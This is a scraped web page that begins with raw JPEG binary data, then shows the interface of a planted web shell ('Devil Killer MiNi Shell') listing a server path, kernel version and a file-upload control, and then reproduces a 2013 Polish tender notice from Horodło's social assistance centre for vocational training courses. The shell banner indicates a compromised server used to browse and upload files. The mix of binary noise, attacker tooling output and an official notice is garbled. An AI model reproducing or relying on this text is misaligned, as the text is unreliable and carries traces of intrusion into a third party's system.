JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130711/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130711/270466-N-2013.html

<p class="kh_header"><b>Horodło: Przeprowadzenie szkoleń i kursów zawodowych dla beneficjentów projektu systemowego - Aktywizacja zawodowa bezrobotnych narażonych na wykluczenie społeczne w gminie Horodło</b><br>
<b>Numer ogłoszenia: 270466 - 2013; data zamieszczenia: 11.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Horodle , ul. Piłsudskiego 51, 22-523 Horodło, woj. lubelskie, tel. 84 651 54 26, faks 84 651 50 25.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminny Ośrodek Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń i kursów zawodowych dla beneficjentów projektu systemowego - Aktywizacja zawodowa bezrobotnych narażonych na wykluczenie społeczne w gminie Horodło.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie szkoleń i kursów umiejętności zawodowych  dla określonej liczby osób oraz zakresu:
Zadanie 1 - Magazynier - 6 osób - 45 godz.;
Zadanie 2 - Sprzedawca z obsługą kasy fiskalnej - 1 osoba - 70 godz.;
Zadanie 3 - Bukieciarz/Florysta - 2 osoby - 132 godz.;
Zadanie 4 - Opiekun osób starszych, chorych i dzieci - 2 osoby-120 godz.;
Zadanie 5 - Prawo jazdy kat. B - 4 osoby - 30 godz.;
Zadanie 6 - Kosmetyczka z elementami wizażu - 2 osoby - 90 godz.;
Zadanie 7 - Obsługa wózka jezdniowego  - 4 osoby - 60 godz.;
Zadanie 8 - Technolog robót wykończeniowych - 13 osób - 230 godz.;
Zadanie 9 - Spotkania indywidualne z psychologiem - 19 osób po 1,30 godz. z każdym uczestnikiem osobno

 Zamawiający zastrzega sobie prawo zmiany liczby osób skierowanych na szkolenie w przypadku, gdy wystąpi okoliczność, że zbędnym, niemożliwym lub koniecznym stanie się przeprowadzenie szkolenia dla mniejszej lub większej liczby osób niż wskazano w specyfikacji istotnych warunków zamówienia.  

W ramach każdego z wyżej wymienionych kursów:
1.	Wykonawca ma obowiązek zapewnienia sal dydaktycznych, specjalistycznych pracowni wyposażonych w niezbędny sprzęt i urządzenia zapewniające bezpieczne szkolenie oraz przygotowanie do egzaminu.
2.	W  przypadku konieczności wynikającej z przepisów BHP Wykonawca jest zobowiązany do zapewnienia uczestnikom kursu odzieży ochronnej.
3.	Wykonawca ma obowiązek ubezpieczyć uczestników szkoleń od następstw nieszczęśliwych wypadków. Koszt ubezpieczenia NNW należy ująć w cenie.
4.	Wykonawca jest zobowiązany do skierowania i sfinansowania niezbędnych badań lekarskich. Koszty te należy uwzględnić w kalkulacji kosztów szkolenia.
5.	Wykonawca ma obowiązek przedłożyć wraz z ofertą szczegółowy program oraz wstępny  harmonogramu szkolenia. Określenie miejsca odbywania zajęć, musi nastąpić co najmniej 5 dni roboczych przed dniem ich rozpoczęciem.
6.	Każdy uczestnik szkolenia, w dniu rozpoczęcia zajęć na kursie otrzyma na własność materiały biurowe (zeszyt i długopis) oraz materiały dydaktyczne (podręczniki, skrypty, inne materiały niezbędne do realizacji szkolenia) oraz harmonogram szkolenia. Materiały te należy uwzględnić w kalkulacji kosztów szkolenia.
7.	Zamawiający wymaga, aby zajęcia odbywały się w odległości nie większej niż 60 km od punktu zaznaczonego na mapie http://mapa.targeo.pl/horodło oraz w odległości nie większej niż 1,5 km od przystanku komunikacji zbiorowej. W celu weryfikacji spełniania tego warunku Zamawiający posłuży się mapą dostępną na stronie www.targeo.pl, opcja trasy - krótka. Wykonawca zapewni transport uczestnikom kursów / szkoleń lub dokona zwrotu kosztów dojazdu. Zamawiający wymaga aby zadanie 8 i zadanie 9 były realizowane na terenie administracyjnym Gminy Horodło.
8.	Zajęcia muszą odbywać się w dni powszednie tj. od poniedziałku do piątku w godz. między 8.00 - 15.00. Dopuszcza się możliwość, jeśli zajdzie taka konieczność, aby pojedyncze zajęcia odbywały się w godzinach późniejszych lub w sobotę, jednak po wcześniejszym uzgodnieniu z osobą odpowiedzialną za realizację projektu ze strony Zleceniodawcy i z uczestnikami projektu. 
9.	Wszystkie dokumenty dotyczące realizacji przedmiotowych działań będą zawierały informację o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
10.	 Wykonawca podczas każdych zajęć zapewni każdemu uczestnikowi poczęstunek składający się z: gorącego posiłku o wadze 350 g. (naprzemiennie: danie mięsne, danie jarskie, danie półmięsne), 1 butelki wody mineralnej o pojemności 0,5 l., 15 dkg ciastek, kawa 250 ml, mleczko, herbata 250 ml.
11.	Pomieszczenia, w których odbywać się będą zajęcia z uczestnikami muszą być oznaczone logotypami POKL, EFS oraz informacją o realizowanym projekcie.
12.	Wykonawca po zakończeniu realizacji kursu wystawi każdemu uczestnikowi certyfikat/ zaświadczenie potwierdzające ukończenie kursu umiejętności zawodowych wraz z wyszczególnieniem rodzaju przeprowadzonych zajęć zgodnie z podstawą programową MEN, oznaczone logotypami POKL, EFS oraz informacją o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Jeżeli wzór (np. MEN) nie zezwala na umieszczenie dodatkowych oznaczeń, to powinno być wręczone dodatkowe zaświadczenie z oznaczeniami. 
13.	Termin prowadzenia kursów: lipiec - listopad 2013 r.
14.	Wykonawca ma obowiązek po zakończeniu realizacji kursu dostarczyć do Zleceniodawcy następujące dokumenty oznaczone logotypami POKL, EFS:
a) potwierdzone za zgodność z oryginałem kserokopie: wydanych zaświadczeń, dzienników zajęć,
b) podpisane przez uczestników listy: obecności, skorzystania z cateringu/poczęstunku na zajęciach, odbioru materiałów szkoleniowych i biurowych z wyszczególnieniem jednostkowym ich składu, odbioru zaświadczeń, 
c) po jednym egzemplarzu wszelkiego rodzaju materiałów i pomocy, które otrzymają uczestnicy,
d) dokumentację zdjęciową z przeprowadzanych kursów na płycie CD lub DVD.
15.	Zamawiający zastrzega sobie prawo do kontroli prowadzonych kursów w trakcie ich realizacji.


4.	OPIS CZĘŚCI ZAMÓWIENIA

Zamawiający dopuszcza możliwość składania ofert częściowych. Każdy z wykonawców może złożyć po jednej ofercie dla każdej z części zamówienia.

 Zamówienie zostanie udzielone w 9 częściach, oznaczonych jako zadania.

Zadanie 1 - Magazynier
Liczba uczestników - 6
Minimalna ilość godzin - 45, 
Tematyka Zajęć / Cel szkolenia: 
Celem szkolenia jest przyuczenie do wykonywania pracy na stanowisku magazyniera oraz nadzorującego pracę magazynu poprzez nabycie umiejętności w zakresie: organizacji pracy 
w magazynach, poznanie podstaw zagospodarowania magazynu i technologii magazynowania, prowadzenia dokumentacji magazynowej, obiegu dokumentów i towarów w magazynie, obsługi komputera w zakresie podstawowym oraz obsługi programów magazynowych. Gospodarka magazynowa - zagadnienia ogólne, Procesy techniczne w gospodarce magazynowej, Zagospodarowanie magazynu I technologia magazynowania, Prowadzenie dokumentacji; obieg dokumentów i towarów, Zasady i technologia magazynowania, Zapasy cel I funkcje zapasów, Zagadnienia organizacyjne gospodarki magazynowej, Personel magazynowy. Prawa i obowiązki, Inwentaryzacja w magazynach, Wdrażanie systemów GHP oraz HACCP, Zapoznanie z obsługą komputera od podstaw, Zasady gospodarki magazynowej oraz obsługa programów WF - Mag I Symfonia.

Zadanie 2 - Sprzedawca z obsługą kasy fiskalnej
Liczba uczestników - 1
Minimalna ilość godzin - 70, 
Tematyka zajęć/Cel szkolenia:
Celem kursu jest nabycie wiedzy i umiejętności w zawodzie sprzedawca wraz z obsługą kasy fiskalnej. Kurs umożliwi słuchaczom zdobycie odpowiedniego zakresu wiadomości niezbędnych w pracy na stanowisku sprzedawca wraz z obsługą kasy fiskalnej. Organizacja działalności handlowej, Towar jako przedmiot handlu, Sztuka sprzedawania, Dokumentacja Handlowa, Wystawianie rachunków i faktur, Etyka zawodu sprzedawcy, Kultura obsługi klienta, Obsługa kas fiskalnych, Ćwiczenia z zakresu sprzedaży. I OBSŁUGA KASY FISKALNEJ:- część teoretyczna i część praktyczna z następujących zagadnień:- podstawowe akty prawne związane z zastosowaniem kas fiskalnych- budowa, zasady działania oraz podział urządzeń fiskalnych i terminali płatniczych. II Komunikowanie się (e-mail, wysyłanie i odczytywanie wiadomości, zarządzanie pocztą elektroniczną, korzystanie z internetu). III Obsługa programu do prowadzenia małej księgowości. Prowadzenie podatkowej księgi przychodów i rozchodów, innych obowiązujących ewidencji podatkowych oraz rozliczenia publicznoprawne w działalności gospodarczej prowadzonej przez osoby fizyczne. Prowadzenie działalności gospodarczej w Polsce. Podatki i inne daniny publiczne w działalności gospodarczej. Prowadzenie podatkowej księgi przychodów i rozchodów. Ewidencje obowiązujące przy prowadzeniu podatkowej księgi przychodów i rozchodów. Rozliczenie wynagrodzeń pracowników oraz z tytułu umów cywilnoprawnych.

Zadanie 3 - Bukieciarz/Florysta 
Liczba uczestników: 2
Minimalna ilość godzin - 132, 
Tematyka zajęć/Cel szkolenia
Teoretyczne i praktyczne przygotowanie słuchaczy do wykonywania kompozycji roślinnych o różnej tematyce. Anatomia i fizjologia roślin, Asortyment roślin ozdobnych, Sposoby utrwalania materiału roślinnego, Główne aspekty uprawy roślin ozdobnych Narzędzia i środki techniczne, Artykuły dekoracyjne, Podstawowe zasady wykonywania kompozycji, Style w kompozycjach, Ekonomika handlu, Wiązanki okolicznościowe, Kompozycje w naczyniach, Florystyka ślubna, Florystyka żałobna, Dekoracje okolicznościowe, Dekoracje z roślin doniczkowych, Kompozycje z roślin suchych, sztucznych i preparowanych.
Zadanie 4 - Opiekun osób starszych, chorych i dzieci
Liczba uczestników: 2
Minimalna ilość godzin - 120, 
Tematyka zajęć/Cel szkolenia
Celem kursu jest przygotowanie słuchacza do pracy w zawodzie opiekuna środowiskowego, wyposażenie słuchaczy w rzetelną wiedzę teoretyczną i praktyczną niezbędną do pełnienia roli osoby pierwszego kontaktu z ludźmi niesamodzielnymi i dziećmi. Psychospołeczne uwarunkowania pracy z podopiecznym, rozwiązywanie problemów podopiecznego, opieka nad podopiecznym. Podstawowe zagadnienia dotyczące rozwoju i wychowania dziecka, praca z dzieckiem upośledzonym, zasady i metody wychowania dziecka. Uczestnictwo w zajęciach praktycznych daje słuchaczom możliwość odniesienia wiedzy zdobywanej na kursie do problemów praktycznych, z jakimi spotykają się w instytucji oraz środowiskach podopiecznych. W trakcie zajęć słuchacze ćwiczą metody postępowania z osobami niepełnosprawnymi, obłożnie chorymi, starymi, chorymi psychicznie i dziećmi oraz zdobywają umiejętności przydatne w wykonywaniu zawodu opiekuna.

Zadanie 5 - Prawo jazdy kat. B
Liczba uczestników: 4
Minimalna ilość godzin - 30, 
Tematyka zajęć/Cel szkolenia
Celem kursu na prawo jazdy kat. B jest przygotowanie osób ubiegających się o prawo jazdy kat. B do kierowania tymi pojazdami w sposób nie zagrażający bezpieczeństwu lub porządkowi ruchu drogowego oraz bardzo dobre przygotowanie osoby szkolonej do egzaminu. Szkolenie teoretyczne obejmie nauczanie z zakresu przepisów ruchu drogowego, techniki kierowania, ogólnej budowy i obsługi pojazdu, pierwszej pomocy, jak i omówienie zachowań na skrzyżowaniu. Szkolenie praktyczne obejmuje: zapoznanie się z wyposażeniem pojazdu, jazdę w ruchu drogowym (na terenie zabudowanym i poza zabudowanym), jazdę na placu manewrowym. Wykonawca zobowiązuje się do ustalenia terminu oraz pokrycia kosztów pierwszego egzaminy państwowego, zarówno praktycznego, jak i teoretycznego w Wojewódzkim Ośrodku Ruchu Drogowego oraz do przekazania do Urzędu kopii wpłat za egzamin oraz kopii dokumentów potwierdzających datę wyznaczonego terminu egzaminu.
Zadanie 6 - Kosmetyczka z elementami wizażu 
Liczba uczestników: 2
Minimalna ilość godzin - 90, 
Tematyka zajęć/Cel szkolenia
Specyfika pracy w gabinecie kosmetycznym, cechy i obowiązki kosmetyczki, urządzenie gabinetu kosmetycznego, przepisy BHP. Budowa i funkcje skóry, charakterystyka cery normalnej, charakterystyka cery suchej, charakterystyka cery  tłustej, charakterystyka cery  mieszanej, charakterystyka cery starczej. Warunki przystąpienia do zabiegu kosmetycznego, stanowisko pracy, wygląd kosmetyczki, wywiad z klientem. Karta pacjenta. Demakijaż oczu, techniki zmywania. Demakijaż twarzy, szyi, dekoltu, techniki zmywania. Pielęgnacja okolic oczu. Środki do pielęgnowania brwi i rzęs. Środki do farbowania brwi i rzęs, farbowanie brwi i rzęs (technika nakładania). Korekta kształtu brwi. Masaż twarzy, szyi, dekoltu, kremy i olejki do masażu. Schorzenia skóry najczęściej spotykane w gabinecie kosmetycznym. Teoretyczne podstawy rozróżniania typów skóry. Warsztat pracy wizażysty. Makijaż korekcyjny. Sposoby retuszowania niedoskonałości skóry. Makijaż dzienny. Zasady makijażu wieczorowego.
Zadanie 7 - Obsługa wózka jezdniowego 
Liczba uczestników: 4
Minimalna ilość godzin - 60, 
Tematyka zajęć/Cel szkolenia
Szkolenie obejmuje zakres materiału zgodny z programem dla osób ubiegających się  o uprawnienia kierowcy wózków widłowych obejmujące wszystkie typy wózków  wraz z bezpieczną wymianą butli gazowych w tychże wózkach. Celem Szkolenia jest nabycie przez uczestników wiedzy teoretycznej i praktycznej, niezbędnej do obsługi wózków jezdniowych z napędem silnikowym oraz bezpiecznej wymiany butli gazowych w wózkach. Typy stosowanych wózków jezdniowych, Budowa wózka, Czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy wózkami, Czynności kierowcy w czasie pracy wózkami, Wiadomości z zakresu ładunkoznawstwa, Wiadomości z zakresu BHP, Wiadomości o dozorze technicznym, Informacje na temat bezpiecznej wymiany butli gazowych w wózkach jezdniowych, Praktyczna nauka jazdy oraz bezpieczna wymiana butli.

Zadanie 8 - Technolog robót wykończeniowych 
Liczba uczestników: 13
Minimalna ilość godzin - 230, 
Tematyka zajęć/Cel szkolenia
Celem kursu jest teoretyczne i praktyczne przygotowanie słuchaczy do wykonywania budowlanych prac wykończeniowych. Podczas uczestnictwa w kursie słuchacze nabędą wiedzę i umiejętności m.in. z zakresu: prac budowlanych z zastosowaniem płyt kartonowo-gipsowych; stosowania tynków szlachetnych; montażu sufitów podwieszanych; kładzenia posadzek z płyt ceramicznych i granitowo-marmurowych; wykończeniowych prac podłogowych; malowania i prac dekoracyjnych; przepisów bhp; technologii robót przy budowie lekkich przegród i ścian działowych; układania posadzek. Słuchacze zostaną przygotowani nie tylko do bezpośredniego wykonywania prac, lecz również do ich zaplanowania, zorganizowania, oceny jakości wykonania i naprawy usterek oraz rozliczenia materiałowo-finansowego. Pozwoli to absolwentom prowadzić własną działalność gospodarczą w zakresie usług budowlanych.

Zadanie 9 - Spotkania indywidualne z psychologiem
Liczba uczestników: 19
Minimalna ilość godzin - po 1,3 godz. z każdym uczestnikiem  osobno, 
Tematyka zajęć/Cel szkolenia
Diagnoza obecnej sytuacji uczestnika projektu. Trening rozwiązywania problemów w trudnych sytuacjach międzyludzkich, odkrycie swoich mocnych stron, potencjałów sprzyjających lepszemu radzeniu sobie w życiu zawodowym i osobistym. Nabycie umiejętności odmawiania, wyrażanie swojego zdania, przyjmowania krytyki, zarządzanie stresem, wzmocnienie pewności siebie. Nakreślenie planu rozwoju dla uczestnika projektu..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego do zamówienia podstawowego, zgodnie z art. 67. ust.1 pkt.6 stanowiących nie więcej niż 50%  wartości realizowanego zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień (odpowiednio do każdej z części).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamwiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się spełnianiem tego warunku, jeżeli należycie w ostatnich trzech latach przed upływam terminu składania ofert lub jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej 2 usługi szkoleniowe, podczas których przeszkolonych było co najmniej 5 osób. Usługi szkoleniowe wskazane przez wykonawcę odpowiadać powinny swym charakterem zakresom poszczególnych części zamówienia (zadań).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić w następujących przypadkach :
a)	W przypadku zaistnienia niemożliwych do przewidzenia okoliczności uniemożliwiających terminowe wykonanie zamówienia, po wcześniejszym pisemnym uzyskaniu zgody Zamawiającego do uzgodnionego harmonogramu usług wprowadzone zostaną zmiany 
b)	Zmian nie dotyczących treści oferty, na podstawie której dokonano wyboru wykonawcy
c)	Dopuszczalnej prawem zmiany stron umowy lub oznaczenia stron umowy .
d)	Wprowadzenia lub zmiany podwykonawcy 
e)	Zmiany wynagrodzenia w następstwie zmiany przepisów o podatku od towarów i usług (VAT)
f)	Zmiany w zakresie przedmiotu zamówienia jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany przepisów prawa.
g)	Wynagrodzenie umowne może ulec zmianie w przypadku ograniczenia przez Zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.horodlo.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej, 22-523 Horodło, ul. Piłsudskiego 51.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2013 godzina 10:00, miejsce: Gminny Ośrodek Pomocy Społecznej, 22-523 Horodło, ul. Piłsudskiego 51.</p>
